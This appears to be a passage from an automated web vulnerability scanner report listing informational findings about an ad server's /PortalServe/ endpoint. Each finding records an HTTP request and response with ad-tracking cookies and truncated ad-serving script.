GET /PortalServe/?pid=1256655V79920110413152406&flash=0&time=0|11:47|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931285%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=7%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=7%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.45725816034136096 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-11D8-970D-1209-8C0000510101; PRca=|AKKi*9708:4|AKEA*263:1|#; PRcp=|AKKiAC6a:4|AKEAAAEP:1|#; PRpl=|FQue:1|FQud:3|FFCo:1|#; PRcr=|GKiM:1|GKiO:3|GEHc:1|#; PRpc=|FQueGKiM:1|FQudGKiO:3|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:47:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2479
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-7DD8-2E31-1209-8C0000530101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:5|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:5|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:1|FQud:4|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:1|GKiO:4|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:1|FQudGKiO:4|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=931285;n=809;x=2304;c=809001050,809001050;g=172;i=7;1=2;2=1;s=376;g=172;m=34;w=51;i=7;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471150&c=1&i=ACA10400-7DD8-2E31-1209-8C0000530101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256655%26adid=1471150'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861122/Premium_300x250_Dft.jpg?PRAd=1471150&PRCID=1471150&PRplcmt=
...[SNIP]...

23.73. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256655V79920110413152406&flash=0&time=0|11:46|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931285%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=10%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=10%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=$CTURL$&r=0.3902176189917021 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-04D6-AB56-1209-8C0000530101; PRca=|AKKi*9708:2|AKEA*263:1|#; PRcp=|AKKiAC6a:2|AKEAAAEP:1|#; PRpl=|FQud:2|FFCo:1|#; PRcr=|GKiO:2|GEHc:1|#; PRpc=|FQudGKiO:2|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:46:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2481
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-26D6-1D91-1209-8C0000530101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:3|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:3|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQud:3|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiO:3|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQudGKiO:3|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=931285;n=809;x=2304;c=809001050,809001050;g=172;i=10;1=2;2=1;s=376;g=172;m=34;w=51;i=10;u=xlO0TcGt89Z-t7Q0A2jzc9p9~042411;k=http://clk.pointroll.com/bc/?a=1471150&c=1&i=ACA10400-26D6-1D91-1209-8C0000530101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256655%26adid=1471150'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861122/Premium_300x250_Dft.jpg?PRAd=1471150&PRCID=1471150&PRplcmt=
...[SNIP]...

23.74. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:50|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=46%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=46%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.4429684339737477 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-5EE1-ACAD-1209-8C0000510101; PRca=|AKKi*9708:19|AKEA*263:1|#; PRcp=|AKKiAC6a:19|AKEAAAEP:1|#; PRpl=|FQue:13|FQud:6|FFCo:1|#; PRcr=|GKiM:13|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:13|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:50:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-F6E1-9585-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:20|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:20|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:14|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:14|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:14|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=46;1=2;2=1;s=376;g=172;m=34;w=51;i=46;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-F6E1-9585-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.75. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:49|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=41%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=41%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.6493744517938762 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-E3E0-6F13-1209-8C0000510101; PRca=|AKKi*9708:17|AKEA*263:1|#; PRcp=|AKKiAC6a:17|AKEAAAEP:1|#; PRpl=|FQue:11|FQud:6|FFCo:1|#; PRcr=|GKiM:11|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:11|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:49:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-10E1-390B-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:18|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:18|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:12|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:12|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:12|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=41;1=2;2=1;s=376;g=172;m=34;w=51;i=41;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-10E1-390B-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.76. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256655V79920110413152406&flash=0&time=0|11:46|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931285%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=8%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=8%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=$CTURL$&r=0.41022151810352664 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BBBAAsJvBBVBF4FR; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=D59D0400-34A2-18F5-1309-720000200101; PRca=|AKEA*263:1|#; PRcp=|AKEAAAEP:1|#; PRpl=|FFCo:1|#; PRcr=|GEHc:1|#; PRpc=|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:46:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2479
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-B4D5-95AF-1209-8C0000530202; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:1|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:1|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQud:1|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiO:1|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQudGKiO:1|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=931285;n=809;x=2304;c=809001050,809001050;g=172;i=8;1=2;2=1;s=376;g=172;m=34;w=51;i=8;u=xlO0TcGt89Z-t7Q0A2jzc9p9~042411;k=http://clk.pointroll.com/bc/?a=1471150&c=1&i=ACA10400-B4D5-95AF-1209-8C0000530202&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256655%26adid=1471150'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861122/Premium_300x250_Dft.jpg?PRAd=1471150&PRCID=1471150&PRplcmt=
...[SNIP]...

23.77. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256655V79920110413152406&flash=0&time=0|11:47|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931285%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=8%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=8%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.23957454794395944 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-7DD8-2E31-1209-8C0000530101; PRca=|AKKi*9708:5|AKEA*263:1|#; PRcp=|AKKiAC6a:5|AKEAAAEP:1|#; PRpl=|FQue:1|FQud:4|FFCo:1|#; PRcr=|GKiM:1|GKiO:4|GEHc:1|#; PRpc=|FQueGKiM:1|FQudGKiO:4|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:47:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2479
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-BCD8-86E6-1209-8C0000530101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:6|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:6|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:1|FQud:5|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:1|GKiO:5|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:1|FQudGKiO:5|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=931285;n=809;x=2304;c=809001050,809001050;g=172;i=8;1=2;2=1;s=376;g=172;m=34;w=51;i=8;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471150&c=1&i=ACA10400-BCD8-86E6-1209-8C0000530101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256655%26adid=1471150'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861122/Premium_300x250_Dft.jpg?PRAd=1471150&PRCID=1471150&PRplcmt=
...[SNIP]...

23.78. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:49|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=36%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=36%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.20012151655048182 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-1CDE-DE1A-1209-8C0000510101; PRca=|AKKi*9708:14|AKEA*263:1|#; PRcp=|AKKiAC6a:14|AKEAAAEP:1|#; PRpl=|FQue:8|FQud:6|FFCo:1|#; PRcr=|GKiM:8|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:8|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:49:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-DBDF-0647-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:15|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:15|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:9|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:9|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:9|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=36;1=2;2=1;s=376;g=172;m=34;w=51;i=36;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-DBDF-0647-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.79. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:51|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=55%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=55%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.8661308722533085 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-86E5-7DBA-1209-8C0000510101; PRca=|AKKi*9708:26|AKEA*263:1|#; PRcp=|AKKiAC6a:26|AKEAAAEP:1|#; PRpl=|FQue:20|FQud:6|FFCo:1|#; PRcr=|GKiM:20|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:20|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:51:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-BAE5-EFBE-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:27|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:27|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:21|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:21|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:21|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

